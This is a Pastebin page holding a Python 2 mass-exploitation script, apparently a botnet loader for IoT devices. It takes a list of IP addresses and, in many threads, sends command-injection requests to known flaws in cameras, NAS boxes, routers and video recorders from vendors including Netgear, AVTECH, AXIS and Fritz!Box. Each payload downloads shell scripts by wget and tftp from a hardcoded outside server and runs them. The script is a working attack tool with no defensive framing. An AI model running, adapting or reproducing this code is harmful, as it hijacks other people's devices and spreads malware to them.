Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import threading, sys, os, re, time, socket, requests, commands, urllib2
- from Queue import *
- from sys import stdout
- if len(sys.argv) < 3:
- print "Usage: python "+sys.argv[0]+" <list> <threads>"
- sys.exit()
- ips = open(sys.argv[1], "r").readlines()
- threads = int(sys.argv[2])
- queue = Queue()
- queue_count = 0
- before = "http://" #http://
- tftpaddr = "95.215.60.17"
- wgetaddr = "95.215.60.17"
- wgetbin = "wgetbin.sh"
- tftp1bin = "tftp1bin.sh"
- tftp2bin = "tftp2bin.sh"
- for ip in ips:
- queue_count += 1
- stdout.write("\r[%d] Added to queue" % queue_count)
- stdout.flush()
- queue.put(ip)
- print "\n"
- def w():
- try:
- while True:
- try:
- IP = queue.get()
- st4rt = brute(IP)
- st4rt.start()
- queue.task_done()
- time.sleep(0.2)
- except:
- print "[*] THREAD UNABLE TO START" #may spam if finished
- pass
- except:
- pass
- #adminvehkoja22120024
- #0000f00: 0000 0000 0000 0000 0000 0000 0000 0000 ................
- #9 spaces
- class brute(threading.Thread):
- def __init__ (self, ip):
- threading.Thread.__init__(self)
- self.ip = str(ip).rstrip('\n')
- def run(self):
- try:
- #ret1 = urllib2.urlopen(before + self.ip + "/shell")
- #ret2 = urllib2.urlopen(before + self.ip + "/upgrade_handle.php")
- #ret3 = urllib2.urlopen(before + self.ip + "/setup.cgi")
- #ret4 = urllib2.urlopen(before + self.ip + "/cgi-bin/supervisor/PwdGrp.cgi")
- #ret5 = urllib2.urlopen(before + self.ip + "/cgi-bin/supervisor/CloudSetup.cgi")
- #ret6 = urllib2.urlopen(before + self.ip + "/cgi-bin/nobody/Search.cgi")
- #ret7 = urllib2.urlopen(before + self.ip + "/board.cgi")
- #ret8 = urllib2.urlopen(before + self.ip + "/app_license.shtml")
- #ret9 = urllib2.urlopen(before + self.ip + "/admin/confnetworking.html")
- #ret10 = urllib2.urlopen(before + self.ip + "/cgi-bin/webcm")
- #ret11 = urllib2.urlopen(before + self.ip + "/backupmgt/getAlias.php")
- #ret12 = urllib2.urlopen(before + self.ip + "/patch/books.cgi")
- #if ret1.code == 200:
- # print "JAWS Found: " + self.ip
- requests.get(before + self.ip + "/shell?" + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " jaws; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " jaws; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " jaws;") # JAWS Web Server
- time.sleep(0.5)
- #if ret2.code == 200:
- # print "NetGear ReadyNAS Found: " + self.ip
- requests.get(before + self.ip + "/upgrade_handle.php?cmd=writeuploaddir&uploaddir=';" + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " readynas; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " readynas; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " readynas;" + ";'") # Netgear ReadyNAS # works
- time.sleep(0.5)
- requests.get(before + self.ip + "/handle_daylightsaving.php?act=update&NTPServer=bla; " + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " readynas2; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " readynas2; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " readynas2;") # ReadyNAS Surveillance
- time.sleep(0.5)
- #if ret3.code == 200:
- # print "NetGear DGN1000 Found: " + self.ip
- requests.get(before + self.ip + "/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=" + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " dgn1000; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " dgn1000; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " dgn1000;" + "&curpath=/¤tsetting.htm=1") # NetGear DGN1000 #Works!
- time.sleep(0.5)
- #if ret4.code == 200:
- # print "AVTECH 1 Found: " + self.ip
- requests.get(before + self.ip + "/cgi-bin/supervisor/PwdGrp.cgi?action=add&user=test&pwd=;" + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " avtech1; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " avtech1; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " avtech1;" + ";&grp=SUPERVISOR&lifetime=5%20MIN") # AVTECH Test 1
- time.sleep(0.5)
- #if ret5.code == 200:
- # print "AVTECH 2 Found: " + self.ip
- requests.get(before + self.ip + "/cgi-bin/supervisor/CloudSetup.cgi?exefile=" + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " avtech2; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " avtech2; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " avtech2;") # AVTECH Test 2
- time.sleep(0.5)
- #if ret6.code == 200:
- # print "AVTECH 3 Found: " + self.ip
- requests.get(before + self.ip + "/cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=LW==&username=admin%20;XmlAp%20r%20Account.User1.Password>$(" + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " avtech3; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " avtech3; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " avtech3;" + ";);&password=admin") #AVTECH Test 3
- time.sleep(0.5)
- #if ret7.code == 200:
- # print "Vacron NVR Found: " + self.ip
- requests.get(before + self.ip + "/board.cgi?cmd=" + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " vacron; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " vacron; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " vacron;") # Vacron NVR Video recorder # not sure
- time.sleep(0.5)
- #if ret8.code == 200:
- # print "AXIS Found: " + self.ip
- requests.get(before + self.ip + "/app_license.shtml?app=ORWELLLABS;" + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " axis; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " axis; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " axis;") # AXIS
- time.sleep(0.5)
- #if ret9.code == 200:
- # print "PineApp Found: " + self.ip
- requests.get(before + self.ip + "/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.com;" + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " pineapp; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " pineapp; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " pineapp;") # PineApp MailSecure
- time.sleep(0.5)
- #if ret10.code == 200:
- # print "Fritz!Box Found: " + self.ip
- requests.get(before + self.ip + "/cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=& ;" + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " fritzbox; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " fritzbox; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " fritzbox;" + "; &") # Fritz!Box
- time.sleep(0.5)
- #if ret11.code == 200:
- # print "Seagate BlackArmor NAS Found: " + self.ip
- requests.get(before + self.ip + "/backupmgt/getAlias.php?ip=" + self.ip + " /etc/passwd; " + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " sgnas; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " sgnas; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " sgnas;") # Seagate BlackArmor NAS sg2000-2000.1331
- time.sleep(0.5)
- #if ret12.code == 200:
- # print "Web Terra Found: " + self.ip
- requests.get(before + self.ip + "/patch/books.cgi?file=|;" + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " webterra; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " webterra; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " webterra;" + ";|") # Web Terra 1.1 # Works
- time.sleep(0.5)
- requests.get(before + self.ip + "/cgi-bin/cgi_main?cmd=transfer_license&method=offline&sn=';" + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " nvrmini2; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " nvrmini2; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " nvrmini2;" + ";#") # NVRmini2
- time.sleep(0.5)
- requests.get(before + self.ip + "/__debugging_center_utils___.php?log=something;" + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " nvrsolo; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " nvrsolo; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " nvrsolo;") # NVRsolo
- except:
- pass
- for l in xrange(threads):
- try:
- t = threading.Thread(target=w)
- t.start()
- time.sleep(0.01)
- except:
- print "[-] FAILED TO START WORKER THREAD"
- pass
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement